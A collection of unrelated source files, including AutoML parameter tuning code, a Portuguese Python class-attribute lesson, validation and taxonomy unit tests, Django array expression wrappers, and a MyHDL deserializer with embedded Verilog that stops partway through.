"eval_metric": ["auc", "logloss"],
"eta": [0.0025, 0.005, 0.0075, 0.01, 0.025, 0.05, 0.075, 0.1]
}
"""
@staticmethod
def get(params, ml_task, seed=1):
np.random.seed(seed)
keys = list(params.keys())
for k in [
"num_class",
"model_type",
"seed",
"ml_task",
"explain_level",
"model_architecture_json",
"n_jobs",
]:
if k in keys:
keys.remove(k)
model_type = params["model_type"]
if model_type == "Baseline":
return [None, None]
model_info = AlgorithmsRegistry.registry[ml_task][model_type]
model_params = model_info["params"]
permuted_keys = np.random.permutation(keys)
key_to_update = None
values = None
for key_to_update in permuted_keys:
values = model_params[key_to_update]
if len(values) > 1:
break
if values is None:
return [None, None]
left, right = None, None
for i, v in enumerate(values):
if v == params[key_to_update]:
if i + 1 < len(values):
right = values[i + 1]
if i - 1 >= 0:
left = values[i - 1]
params_1, params_2 = None, None
if left is not None:
params_1 = copy.deepcopy(params)
params_1[key_to_update] = left
if right is not None:
params_2 = copy.deepcopy(params)
params_2[key_to_update] = right
if params_1 is not None and "model_architecture_json" in params_1:
del params_1["model_architecture_json"]
if params_2 is not None and "model_architecture_json" in params_2:
del params_2["model_architecture_json"]
return [params_1, params_2]
|
class Pessoa:
olhos = 2
def __init__(self, *filhos, nome=None, idade=38):
self.idade = idade
self.nome = nome
self.filhos = list(filhos)
def cumprimentar(self):
return f'Olá {id(self)}'
@staticmethod
def metodo_estatico():
return 42
@classmethod
def nome_e_atributos_de_classe(cls):
return f'{cls} - olhos {cls.olhos}'
if __name__ == '__main__':
camillo = Pessoa(nome='Camillo')
hugo = Pessoa(camillo, nome='Hugo')
print(Pessoa.cumprimentar(hugo))
print(id(hugo))
print(hugo.cumprimentar())
print(hugo.nome)
print(hugo.idade)
for filho in hugo.filhos:
print(filho.nome)
hugo.sobrenome = 'Barbosa'
del hugo.filhos
hugo.olhos = 1
del hugo.olhos
print(hugo.__dict__)
print(camillo.__dict__)
Pessoa.olhos = 3
print(Pessoa.olhos)
print(hugo.olhos)
print(camillo.olhos)
print(id(Pessoa.olhos), id(hugo.olhos), id(camillo.olhos))
print(Pessoa.metodo_estatico(), hugo.metodo_estatico())
print(Pessoa.nome_e_atributos_de_classe(), hugo.metodo_estatico())
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .datastructures import SortedDict
from .decorators import retry
from .network import get_localhost_ip
from .network import host2ip
from .network import force_ip
from .network import device_from_ip
from .shell import execute
from .shell import ScriptRunner
from .shortcuts import host_iter
from .shortcuts import hosts
from .shortcuts import get_current_user
from .shortcuts import get_current_username
from .shortcuts import split_hosts
from .strings import COLORS
from .strings import color_text
from .strings import mask_string
from .strings import state_format
from .strings import state_message
__all__ = ('SortedDict',
'retry',
'get_localhost_ip', 'host2ip', 'force_ip', 'device_from_ip',
'ScriptRunner', 'execute',
'host_iter', 'hosts', 'get_current_user', 'get_current_username',
'split_hosts', 'COLORS', 'color_text', 'mask_string',
'state_format', 'state_message')
|
from encomp.constants import CONSTANTS
from encomp.units import Quantity
from encomp.utypes import Density, Pressure
def test_CONSTANTS():
assert isinstance(CONSTANTS.default_density, Quantity[Density])
assert isinstance(CONSTANTS.normal_conditions_pressure, Quantity[Pressure])
|
from __future__ import annotations
from unittest import TestCase
from jsonclasses.exceptions import ValidationException
from tests.classes.simple_article import SimpleArticle
class TestStr(TestCase):
def test_str_is_str_after_assigned(self):
article = SimpleArticle(title='Lak Lak')
self.assertEqual(article._data_dict,
{'title': 'Lak Lak', 'content': None})
def test_str_raises_if_value_is_not_string(self):
article = SimpleArticle(title=66)
with self.assertRaises(ValidationException) as context:
article.validate()
self.assertEqual(len(context.exception.keypath_messages), 1)
self.assertEqual(context.exception.keypath_messages['title'],
"Value '66' at 'title' should be str.")
def test_str_is_str_when_tojson(self):
article = SimpleArticle(title='Lak Lak')
self.assertEqual(article.tojson(),
{'title': 'Lak Lak', 'content': None})
|
from .dice import Dice
|
import unittest
import pandas as pd
import pandas.testing as pdt
import biom
import numpy as np
import numpy.testing as npt
from qiime2 import Artifact
from microsetta_public_api.models._taxonomy import GroupTaxonomy, Taxonomy
from microsetta_public_api.exceptions import (DisjointError, UnknownID,
SubsetError)
from microsetta_public_api.utils import DataTable, create_data_entry
class TaxonomyTests(unittest.TestCase):
def setUp(self):
self.table = biom.Table(np.array([[0, 1, 2],
[2, 4, 6],
[3, 0, 1]]),
['feature-1', 'feature-2', 'feature-3'],
['sample-1', 'sample-2', 'sample-3'])
self.taxonomy_df = pd.DataFrame([['feature-1', 'a; b; c', 0.123],
['feature-2', 'a; b; c; d; e', 0.345],
['feature-3', 'a; f; g; h', 0.678]],
columns=['Feature ID', 'Taxon',
'Confidence'])
self.taxonomy_df.set_index('Feature ID', inplace=True)
self.table_ranks = self.table.rankdata(inplace=False)
self.table2 = biom.Table(np.array([[0, 1, 2],
[2, 4, 6],
[3, 0, 1]]),
['feature-1', 'feature-X', 'feature-3'],
['sample-1', 'sample-2', 'sample-3'])
self.taxonomy2_df = pd.DataFrame([['feature-1', 'a; b; c', 0.123],
['feature-X', 'a; b; c; d; e', 0.34],
['feature-3', 'a; f; g; h', 0.678]],
columns=['Feature ID', 'Taxon',
'Confidence'])
self.taxonomy2_df.set_index('Feature ID', inplace=True)
self.taxonomy_superset_df = self.taxonomy2_df.copy()
self.taxonomy_superset_df.loc['feature-2'] = \
self.taxonomy_df.loc['feature-2']
self.taxonomy_greengenes_df = pd.DataFrame(
[['feature-1', 'k__a; p__b; o__c', 0.123],
['feature-2', 'k__a; p__b; o__c;f__d;g__e', 0.34],
['feature-3', 'k__a; p__f; o__g; f__h', 0.678]],
columns=['Feature ID', 'Taxon', 'Confidence'])
self.taxonomy_greengenes_df.set_index('Feature ID', inplace=True)
self.table2_ranks = self.table2.rankdata(inplace=False)
# variances
self.table_vars = biom.Table(np.array([[0, 1, 2],
[2, 4, 6],
[3, 0, 1]]),
['feature-1', 'feature-2', 'feature-3'],
['sample-1', 'sample-2', 'sample-3'])
self.no_variances = biom.Table(np.zeros((3, 3)),
['feature-1', 'feature-2', 'feature-3'],
['sample-1', 'sample-2', 'sample-3'])
def test_qza_integration(self):
table_qza = Artifact.import_data(
"FeatureTable[Frequency]", self.table
)
taxonomy_qza = Artifact.import_data(
"FeatureData[Taxonomy]", self.taxonomy_df,
)
table = table_qza.view(biom.Table)
taxonomy_df = taxonomy_qza.view(pd.DataFrame)
taxonomy = Taxonomy(table, taxonomy_df)
taxonomy.get_group(['sample-1', 'sample-2'], 'foo')
def test_get_sample_ids(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df)
npt.assert_equal(taxonomy._get_sample_ids(), ['sample-1', 'sample-2',
'sample-3'])
def test_get_feature_ids(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df)
npt.assert_equal(taxonomy._get_feature_ids(), ['feature-1',
'feature-2',
'feature-3'])
def test_init_no_variances(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df)
self.assertEqual(taxonomy._table, self.table.copy().norm())
self.assertEqual(taxonomy._variances, self.no_variances)
pdt.assert_frame_equal(taxonomy._features, self.taxonomy_df)
def test_init_variances(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df, self.table_vars)
self.assertEqual(taxonomy._table, self.table.copy().norm())
self.assertEqual(taxonomy._variances, self.table_vars)
pdt.assert_frame_equal(taxonomy._features, self.taxonomy_df)
self.assertEqual(list(taxonomy._table.ids(axis='observation')),
list(taxonomy._features.index))
self.assertEqual(list(taxonomy._table.ids(axis='observation')),
list(taxonomy._variances.ids(axis='observation')))
def test_init_disjoint(self):
with self.assertRaisesRegex(SubsetError,
"not a subset"):
Taxonomy(self.table, self.taxonomy2_df)
with self.assertRaisesRegex(SubsetError,
"not a subset"):
Taxonomy(self.table2, self.taxonomy_df)
def test_init_allow_taxonomy_superset(self):
Taxonomy(self.table, self.taxonomy_superset_df)
def test_init_disjoint_variances(self):
bad = self.table_vars.copy()
bad.update_ids({'sample-1': 'sample-bad'}, inplace=True, strict=False)
with self.assertRaisesRegex(DisjointError,
"Table and variances are disjoint"):
Taxonomy(self.table, self.taxonomy_df, bad)
def _clean_sort_df(self, df, cols):
df.sort_values(cols, inplace=True)
df.reset_index(drop=True, inplace=True)
def test_init_rankdata(self):
exp = pd.DataFrame([['c', 'sample-1', 1.],
['c', 'sample-2', 1],
['c', 'sample-3', 2],
['g', 'sample-1', 2],
['g', 'sample-3', 1]],
columns=['Taxon', 'Sample ID', 'Rank'])
taxonomy = Taxonomy(self.table, self.taxonomy_df, rank_level=2)
obs = taxonomy._ranked
self._clean_sort_df(obs, ['Taxon', 'Sample ID'])
self._clean_sort_df(exp, ['Taxon', 'Sample ID'])
pdt.assert_frame_equal(obs, exp, check_like=True)
def test_init_rankdata_order(self):
exp = ['c', 'g']
taxonomy = Taxonomy(self.table, self.taxonomy_df, rank_level=2)
obs = list(taxonomy._ranked_order.index)
self.assertEqual(obs, exp)
def test_ranks_sample(self):
exp = pd.DataFrame([['c', 'sample-1', 1.],
['c', 'sample-2', 1],
['c', 'sample-3', 2],
['g', 'sample-1', 2],
['g', 'sample-3', 1]],
columns=['Taxon', 'Sample ID', 'Rank'])
taxonomy = Taxonomy(self.table, self.taxonomy_df, rank_level=2)
obs = taxonomy.ranks_sample(5)
self._clean_sort_df(obs, ['Taxon', 'Sample ID'])
self._clean_sort_df(exp, ['Taxon', 'Sample ID'])
pdt.assert_frame_equal(obs, exp, check_like=True)
obs = taxonomy.ranks_sample(4)
self.assertIn(sorted(obs['Taxon'].values), [['c', 'c', 'c', 'g'],
['c', 'c', 'g', 'g']])
obs = taxonomy.ranks_sample(100)
self.assertEqual(sorted(obs['Taxon'].values),
['c', 'c', 'c', 'g', 'g'])
def test_ranks_specific(self):
exp_1 = pd.DataFrame([['c', 'sample-1', 1.],
['g', 'sample-1', 2]],
columns=['Taxon', 'Sample ID', 'Rank'])
exp_2 = pd.DataFrame([['c', 'sample-2', 1.]],
columns=['Taxon', 'Sample ID', 'Rank'])
exp_3 = pd.DataFrame([['c', 'sample-3', 2.],
['g', 'sample-3', 1]],
columns=['Taxon', 'Sample ID', 'Rank'])
taxonomy = Taxonomy(self.table, self.taxonomy_df, rank_level=2)
obs_1 = taxonomy.ranks_specific('sample-1')
obs_2 = taxonomy.ranks_specific('sample-2')
obs_3 = taxonomy.ranks_specific('sample-3')
self._clean_sort_df(obs_1, ['Taxon', 'Sample ID'])
self._clean_sort_df(obs_2, ['Taxon', 'Sample ID'])
self._clean_sort_df(obs_3, ['Taxon', 'Sample ID'])
self._clean_sort_df(exp_1, ['Taxon', 'Sample ID'])
self._clean_sort_df(exp_2, ['Taxon', 'Sample ID'])
self._clean_sort_df(exp_3, ['Taxon', 'Sample ID'])
pdt.assert_frame_equal(obs_1, exp_1, check_like=True)
pdt.assert_frame_equal(obs_2, exp_2, check_like=True)
pdt.assert_frame_equal(obs_3, exp_3, check_like=True)
def test_ranks_specific_missing_id(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df, rank_level=2)
with self.assertRaisesRegex(UnknownID, 'foobar'):
taxonomy.ranks_specific('foobar')
def test_ranks_order(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df, rank_level=2)
exp = ['c', 'g']
obs = taxonomy.ranks_order()
self.assertEqual(obs, exp)
exp = ['c', 'g']
obs = taxonomy.ranks_order(['g', 'c'])
self.assertEqual(obs, exp)
exp = ['c']
obs = taxonomy.ranks_order(['c', ])
self.assertEqual(obs, exp)
def test_ranks_order_unknown(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df, rank_level=2)
with self.assertRaisesRegex(UnknownID, "foobar"):
taxonomy.ranks_order(["foobar", ])
with self.assertRaisesRegex(UnknownID, "foobar"):
taxonomy.ranks_order(["c", "foobar", ])
def test_index_taxa_prevalence(self):
table = biom.Table(np.array([[0, 1, 2, 0],
[2, 4, 6, 1],
[3, 0, 0, 0]]),
['feature-1', 'feature-2', 'feature-3'],
['sample-1', 'sample-2', 'sample-3', 'sample-4'])
taxonomy_df = pd.DataFrame([['feature-1', 'a; b; c', 0.123],
['feature-2', 'a; b; c; d; e', 0.345],
['feature-3', 'a; f; g; h', 0.678]],
columns=['Feature ID', 'Taxon',
'Confidence'])
taxonomy_df.set_index('Feature ID', inplace=True)
tax = Taxonomy(table, taxonomy_df)
exp_unique = pd.Series([False, False, True],
index=['feature-1', 'feature-2', 'feature-3'])
exp_prev = pd.Series([0.5, 1., 0.25],
index=['feature-1', 'feature-2', 'feature-3'])
pdt.assert_series_equal(exp_unique, tax.feature_uniques)
pdt.assert_series_equal(exp_prev, tax.feature_prevalence)
def test_rare_unique(self):
# feature 1 is "rare" for samples 2 and 3 at a theshold of <= 50%
# feature 3 is "unique" to sample 1
table = biom.Table(np.array([[0, 1, 2, 0],
[2, 4, 6, 1],
[3, 0, 0, 0]]),
['feature-1', 'feature-2', 'feature-3'],
['sample-1', 'sample-2', 'sample-3', 'sample-4'])
taxonomy_df = pd.DataFrame([['feature-1', 'a; b; c', 0.123],
['feature-2', 'a; b; c; d; e', 0.345],
['feature-3', 'a; f; g; h', 0.678]],
columns=['Feature ID', 'Taxon',
'Confidence'])
taxonomy_df.set_index('Feature ID', inplace=True)
tax = Taxonomy(table, taxonomy_df)
exp = {'sample-1': {'rare': {'feature-3': 0.25},
'unique': ['feature-3', ]},
'sample-2': {'rare': {'feature-1': 0.5},
'unique': None},
'sample-3': {'rare': {'feature-1': 0.5},
'unique': None},
'sample-4': {'rare': None, 'unique': None}}
for k, e in exp.items():
obs = tax.rare_unique(k, rare_threshold=0.51)
self.assertEqual(obs, e)
def test_bp_tree(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df)
bp_tree = taxonomy.bp_tree
exp_parens = [1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1,
0, 0, 0, 0, 0, 0]
obs_parens = list(bp_tree.B)
self.assertListEqual(exp_parens, obs_parens)
exp_names = [
'a', 'b', 'c', 'feature-1', 'd', 'e', 'feature-2', 'f', 'g', 'h',
'feature-3',
]
obs_names = []
for i in range(len(bp_tree.B)):
name = bp_tree.name(i)
if name is not None:
obs_names.append(name)
self.assertListEqual(exp_names, obs_names)
def test_get_group(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df)
exp = GroupTaxonomy(name='sample-2',
taxonomy='((((feature-1,((feature-2)e)d)c)b)a);',
features=['feature-1', 'feature-2'],
feature_values=[1. / 5, 4. / 5],
feature_variances=[0.0, 0.0])
obs = taxonomy.get_group(['sample-2'])
self.assertEqual(obs, exp)
def test_get_group_multiple(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df)
exp = GroupTaxonomy(name='foo',
taxonomy='((((feature-1,((feature-2)e)d)c)b,(((feature-3)h)g)f)a);', # noqa
features=['feature-1', 'feature-2', 'feature-3'],
feature_values=[1. / 10, 6. / 10, 3. / 10],
feature_variances=[0.0, 0.0, 0.0])
obs = taxonomy.get_group(['sample-1', 'sample-2'], 'foo')
self.assertEqual(obs.name, exp.name)
self.assertEqual(obs.taxonomy, exp.taxonomy)
self.assertEqual(obs.features, exp.features)
npt.assert_almost_equal(obs.feature_values, exp.feature_values)
self.assertEqual(obs.feature_variances, exp.feature_variances)
def test_get_group_with_variances(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df, self.table_vars)
exp = GroupTaxonomy(name='sample-1',
taxonomy='((((((feature-2)e)d)c)b,(((feature-3)h)g)f)a);', # noqa
features=['feature-2', 'feature-3'],
feature_values=[2. / 5, 3. / 5],
feature_variances=[2.0, 3.0])
obs = taxonomy.get_group(['sample-1'])
self.assertEqual(obs, exp)
def test_get_group_missing(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df)
with self.assertRaisesRegex(UnknownID, "sample-X does not exist"):
taxonomy.get_group(['sample-X'])
def test_get_counts(self):
taxonomy_df = pd.DataFrame([['feature-1', 'k__a; p__b; c__c', 0.123],
['feature-2',
'k__a; p__b; c__c; o__d; f__e', 0.345],
['feature-3', 'k__a; p__f; c__g; o__h',
0.678]],
columns=['Feature ID', 'Taxon',
'Confidence'])
taxonomy_df.set_index('Feature ID', inplace=True)
taxonomy = Taxonomy(self.table, taxonomy_df)
expected = [('Kingdom', {'a': 3}), ('Phylum', {'b': 2, 'f': 1})]
for level, exp in expected:
obs = taxonomy.get_counts(level)
self.assertEqual(obs, exp)
obs = taxonomy.get_counts(level, samples=['sample-1', 'sample-2',
'sample-3'])
self.assertEqual(obs, exp)
expected_batch = [('sample-1', [('Kingdom', {'a': 2}),
('Phylum', {'b': 1, 'f': 1})]),
('sample-2', [('Kingdom', {'a': 2}),
('Phylum', {'b': 2})]),
('sample-3', [('Kingdom', {'a': 3}),
('Phylum', {'b': 2, 'f': 1})])]
for sample, expected in expected_batch:
for level, exp in expected:
obs = taxonomy.get_counts(level, samples=sample)
self.assertEqual(obs, exp)
def test_presence_data_table(self):
taxonomy = Taxonomy(self.table, self.taxonomy_greengenes_df,
self.table_vars)
obs = taxonomy.presence_data_table(['sample-1', 'sample-2'])
exp_columns = ['sampleId', 'Kingdom', 'Phylum', 'Class', 'Order',
'Family', 'Genus', 'Species', 'relativeAbundance']
DataEntry = create_data_entry(exp_columns)
exp = DataTable(
data=[
DataEntry(**{
'sampleId': 'sample-1',
'Kingdom': 'a',
'Phylum': 'b',
'Class': None,
'Order': 'c',
'Family': 'd',
'Genus': 'e',
'Species': None,
'relativeAbundance': 2. / 5,
}),
DataEntry(**{
'sampleId': 'sample-1',
'Kingdom': 'a',
'Phylum': 'f',
'Class': None,
'Order': 'g',
'Family': 'h',
'Genus': None,
'Species': None,
'relativeAbundance': 3. / 5,
}),
DataEntry(**{
'sampleId': 'sample-2',
'Kingdom': 'a',
'Phylum': 'b',
'Class': None,
'Order': 'c',
'Family': None,
'Genus': None,
'Species': None,
'relativeAbundance': 1. / 5,
}),
DataEntry(**{
'sampleId': 'sample-2',
'Kingdom': 'a',
'Phylum': 'b',
'Class': None,
'Order': 'c',
'Family': 'd',
'Genus': 'e',
'Species': None,
'relativeAbundance': 4. / 5,
}),
],
columns=exp_columns,
)
self.assertListEqual([{'data': col} for col in exp.columns],
obs.columns)
# wouldn't want to do this on a huge dataframe..., but it checks if
# there is a row of obs corresponding to each row of exp...
exp_df = pd.DataFrame(exp.data)
obs_df = pd.DataFrame(obs.data)
obs_df_copy = obs_df.copy()
for e_idx, row_exp in exp_df.iterrows():
for o_idx, row_obs in obs_df.iterrows():
if row_exp.eq(row_obs).all():
obs_df_copy.drop(index=o_idx, inplace=True)
break
self.assertTrue(obs_df_copy.empty)
class GroupTaxonomyTests(unittest.TestCase):
def setUp(self):
self.tstr = '(((((feature-2)e)d,feature-1)c)b)a;'
self.obj = GroupTaxonomy(name='sample-2',
taxonomy=self.tstr,
features=['feature-1', 'feature-2'],
feature_values=[1. / 5, 4. / 5],
feature_variances=[0.0, 0.0])
def test_init(self):
self.assertEqual(self.obj.name, 'sample-2')
self.assertEqual(self.obj.taxonomy, self.tstr)
self.assertEqual(self.obj.features, ['feature-1', 'feature-2'])
self.assertEqual(self.obj.feature_values, [1. / 5, 4. / 5])
self.assertEqual(self.obj.feature_variances, [0.0, 0.0])
def test_init_tree_missing_feature(self):
with self.assertRaisesRegex(UnknownID,
"is not in the taxonomy."):
GroupTaxonomy(name='sample-2',
taxonomy=self.tstr,
features=['feature-1', 'feature-3'],
feature_values=[1. / 5, 4. / 5],
feature_variances=[0.0, 0.0])
def test_init_feature_value_lengths(self):
with self.assertRaisesRegex(ValueError,
"length mismatch"):
GroupTaxonomy(name='sample-2',
taxonomy=self.tstr + 'feature-3',
features=['feature-1', 'feature-2', 'feature-3'],
feature_values=[1. / 5, 4. / 5],
feature_variances=[0.0, 0.0])
with self.assertRaisesRegex(ValueError,
"length mismatch"):
GroupTaxonomy(name='sample-2',
taxonomy=self.tstr,
features=['feature-1', 'feature-2'],
feature_values=[1. / 5, ],
feature_variances=[0.0, 0.0])
def test_to_dict(self):
exp = {'name': 'sample-2',
'taxonomy': self.tstr,
'features': ['feature-1', 'feature-2'],
'feature_values': [1. / 5, 4. / 5],
'feature_variances': [0.0, 0.0]}
obs = self.obj.to_dict()
self.assertEqual(obs, exp)
def test_str(self):
exp = str(self.obj.to_dict())
obs = str(self.obj)
self.assertEqual(obs, exp)
if __name__ == '__main__':
unittest.main()
|
from django.db.models.expressions import Func, Expression
from pragmatic.models.expressions import F, Value
class Round(Func):
function = 'ROUND'
arity = 2
# https://github.com/primal100/django_postgres_extensions
class SimpleFunc(Func):
def __init__(self, field, *values, **extra):
if not isinstance(field, Expression):
field = F(field)
if values and not isinstance(values[0], Expression):
values = [Value(v) for v in values]
super(SimpleFunc, self).__init__(field, *values, **extra)
class ArrayAppend(SimpleFunc):
function = 'ARRAY_APPEND'
class ArrayPrepend(Func):
function = 'ARRAY_PREPEND'
def __init__(self, value, field, **extra):
if not isinstance(value, Expression):
value = Value(value)
field = F(field)
super(ArrayPrepend, self).__init__(value, field, **extra)
class ArrayRemove(SimpleFunc):
function = 'ARRAY_REMOVE'
class ArrayReplace(SimpleFunc):
function = 'ARRAY_REPLACE'
class ArrayPosition(SimpleFunc):
function = 'ARRAY_POSITION'
class ArrayPositions(SimpleFunc):
function = 'ARRAY_POSITIONS'
class ArrayLength(SimpleFunc):
function = 'ARRAY_LENGTH'
|
##############################################################################
#
# Copyright (c) 2003 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Extension to use doctest tests as unit tests
This module provides a DocTestSuite contructor for converting doctest
tests to unit tests.
$Id: doctestunit.py 28304 2004-10-31 17:59:45Z jim $
"""
from doctest import DocFileSuite, DocTestSuite
from doctest import debug_src, debug
def pprint():
from pprint import PrettyPrinter
def pprint(ob, **opts):
if 'width' not in opts:
opts['width'] = 1
return PrettyPrinter(**opts).pprint(ob)
return pprint
pprint = pprint()
|
from myhdl import block, instance
@block
def serdes_1_to_5(use_phase_detector, data_in_p, data_in_n, rx_io_clock,
rx_serdes_strobe, reset, g_clock, bit_slip, data_out,
diff_term='TRUE', bit_slip_enable='TRUE', sim_tap_delay = 49):
"""
The block converts the serial data into a 5 bit parallel data. This block will be replaced
with the xilinx primitives IODELAY2 and ISERDES2 during conversion.
Args:
use_phase_detector: The signal is used by the xilinx primitive
data_in_p: The input differential data
data_in_n: The input differential data
rx_io_clock: The clock from the input side (serial data)
rx_serdes_strobe: The signal is used by the xilinx primitive
reset: The signal is used by the xilinx primitive
g_clock: The clock on the output side (parallel data)
bit_slip: The signal is used by the xilinx primitive
data_out: The output parallel data (5-bit)
diff_term: The parameter is used by the xilinx primitive
bit_slip_enable: The parameter is used by the xilinx primitive
sim_tap_delay: The parameter is used by the xilinx primitive
Returns:
myhdl.instances() : A list of myhdl instances.
"""
data = ['0' for _ in range(5)]
@instance
def deserialize():
while True:
yield rx_io_clock.posedge
data.append('1' if data_in_p else '0')
data.pop(0)
@instance
def assign():
while True:
yield g_clock.posedge
data_out.next = int(''.join(data[::-1]), 2)
return deserialize, assign
serdes_1_to_5.verilog_code = """
assign busy_data = busys ;
assign cal_data_slave = cal_data_sint ;
/////////////////////////////////////////////////
//
// IDELAY Calibration FSM
//
/////////////////////////////////////////////////
always @ (posedge $g_clock or posedge $reset)
begin
if ($reset == 1'b1) begin
state <= 0 ;
cal_data_master <= 1'b0 ;
cal_data_sint <= 1'b0 ;
counter <= 9'h000 ;
enable <= 1'b0 ;
mux <= 1'h1 ;
end
else begin
counter <= counter + 9'h001 ;
if (counter[8] == 1'b1) begin
counter <= 9'h000 ;
end
if (counter[5] == 1'b1) begin
enable <= 1'b1 ;
end
if (state == 0 && enable == 1'b1) begin // Wait for IODELAY to be available
cal_data_master <= 1'b0 ;
cal_data_sint <= 1'b0 ;
rst_data <= 1'b0 ;
if (busy_data_d == 1'b0) begin
state <= 1 ;
end
end
else if (state == 1) begin // Issue calibrate command to both master and slave, needed for simulation, not for the silicon
cal_data_master <= 1'b1 ;
cal_data_sint <= 1'b1 ;
if (busy_data_d == 1'b1) begin // and wait for command to be accepted
state <= 2 ;
end
end
else if (state == 2) begin // Now RST master and slave IODELAYs needed for simulation, not for the silicon
cal_data_master <= 1'b0 ;
cal_data_sint <= 1'b0 ;
if (busy_data_d == 1'b0) begin
rst_data <= 1'b1 ;
state <= 3 ;
end
end
else if (state == 3) begin // Wait for IODELAY to be available
rst_data <= 1'b0 ;
if (busy_data_d == 1'b0) begin
state <= 4 ;
end
end
else if (state == 4) begin // Wait for occasional enable
if (counter[8] == 1'b1) begin
state <= 5 ;
end
end
else if (state == 5) begin // Calibrate slave only
if (busy_data_d == 1'b0) begin
cal_data_sint <= 1'b1 ;
state <= 6 ;
end
end
else if (state == 6) begin // Wait for command to be accepted
cal_data_sint <= 1'b0 ;
if (busy_data_d == 1'b1) begin
state <= 7 ;
end
end
else if (state == 7) begin // Wait for all IODELAYs to be available, ie CAL command finished
cal_data_sint <= 1'b0 ;
if (busy_data_d == 1'b0) begin
state <= 4 ;
end
end
end
end
always @ (posedge $g_clock or posedge $reset) // Per-bit phase detection state machine
begin
if ($reset == 1'b1) begin
pdcounter <= 5'b1000 ;
ce_data_inta <= 1'b0 ;
flag <= 1'b0 ; // flag is there to only allow one inc or dec per cal (test)
end
else begin
busy_data_d <= busy_data_or[1] ;
if ($use_phase_detector == 1'b1) begin // decide whther pd is used
incdec_data_d <= incdec_data_or[1] ;
valid_data_d <= valid_data_or[1] ;
if (ce_data_inta == 1'b1) begin
ce_data = mux ;
end
else begin
ce_data = 64'h0000000000000000 ;
end
if (state == 7) begin
flag <= 1'b0 ;
end
else if (state != 4 || busy_data_d == 1'b1) begin // Reset filter if state machine issues a cal command or unit is busy
pdcounter <= 5'b10000 ;
ce_data_inta <= 1'b0 ;
end
else if (pdcounter == 5'b11111 && flag == 1'b0) begin // Filter has reached positive max - increment the tap count
ce_data_inta <= 1'b1 ;
inc_data_int <= 1'b1 ;
pdcounter <= 5'b10000 ;
flag <= 1'b1 ;
end
else if (pdcounter == 5'b00000 && flag == 1'b0) begin // Filter has reached negative max - decrement the tap count
ce_data_inta <= 1'b1 ;
inc_data_int <= 1'b0 ;
pdcounter <= 5'b10000 ;
flag <= 1'b1 ;
end
else if (valid_data_d == 1'b1) begin // increment filter
ce_data_inta <= 1'b0 ;
if (incdec_data_d == 1'b1 && pdcounter != 5'b11111) begin
pdcounter <= pdcounter + 5'b00001 ;
end
else if (incdec_data_d == 1'b0 && pdcounter != 5'b00000) begin // decrement filter
pdcounter <= pdcounter + 5'b11111 ;
end
end
else begin
ce_data_inta <= 1'b0 ;
end
end
else begin
ce_data = all_ce ;
inc_data_int = debug_in[1] ;
end
end
end
assign inc_data = inc_data_int ;
assign incdec_data_or[0] = 1'b0 ; // Input Mux - Initialise generate loop OR gates
assign valid_data_or[0] = 1'b0 ;
assign busy_data_or[0] = 1'b0 ;
assign incdec_data_im = incdec_data & mux; // Input muxes
assign incdec_data_or[1] = incdec_data_im | incdec_data_or; // AND gates to allow just one signal through at a tome
assign valid_data_im = valid_data & mux; // followed by an OR
assign valid_data_or[1] = valid_data_im | valid_data_or; // for the three inputs from each PD
assign busy_data_or[1] = busy_data | busy_data_or; // The busy signals just need an OR gate
assign all_ce = debug_in[0] ;
IBUFDS #(
.DIFF_TERM ("$diff_term"))
data_in (
.I ($data_in_p),
.IB ($data_in_n),
.O (rx_data_in)
);
//
// Master IDELAY
//
IODELAY2 #(
.DATA_RATE ("SDR"),
.IDELAY_VALUE (0),
.IDELAY2_VALUE (0),
.IDELAY_MODE ("NORMAL" ),
.ODELAY_VALUE (0),
.IDELAY_TYPE ("DIFF_PHASE_DETECTOR"),
.COUNTER_WRAPAROUND ("STAY_AT_LIMIT"), //("WRAPAROUND"),
.DELAY_SRC ("IDATAIN"),
.SERDES_MODE ("MASTER"),
.SIM_TAPDELAY_VALUE ($sim_tap_delay)
) iodelay_m (
.IDATAIN (rx_data_in), // data from IBUFDS
.TOUT (), // tri-state signal to IOB
.DOUT (), // output data to IOB
.T (1'b1), // tri-state control from OLOGIC/OSERDES2
.ODATAIN (1'b0), // data from OLOGIC/OSERDES2
.DATAOUT (ddly_m), // Output data 1 to ILOGIC/ISERDES2
.DATAOUT2 (), // Output data 2 to ILOGIC/ISERDES2
.IOCLK0 ($rx_io_clock), // High speed clock for calibration
.IOCLK1 (1'b0), // High speed clock for calibration
.CLK ($g_clock), // Fabric clock (GCLK) for control signals
.CAL (cal_data_master), // Calibrate control signal
.INC (inc_data), // Increment counter
.CE (ce_data), // Clock Enable
.RST (rst_data), // Reset delay line
.BUSY () // output signal indicating sync circuit has finished / calibration has finished
);
//
// Slave IDELAY
//
IODELAY2 #(
.DATA_RATE ("SDR"),
.IDELAY_VALUE (0),
.IDELAY2_VALUE (0),
.IDELAY_MODE ("NORMAL" ),
.ODELAY_VALUE (0),
.IDELAY_TYPE ("DIFF_PHASE_DETECTOR"),
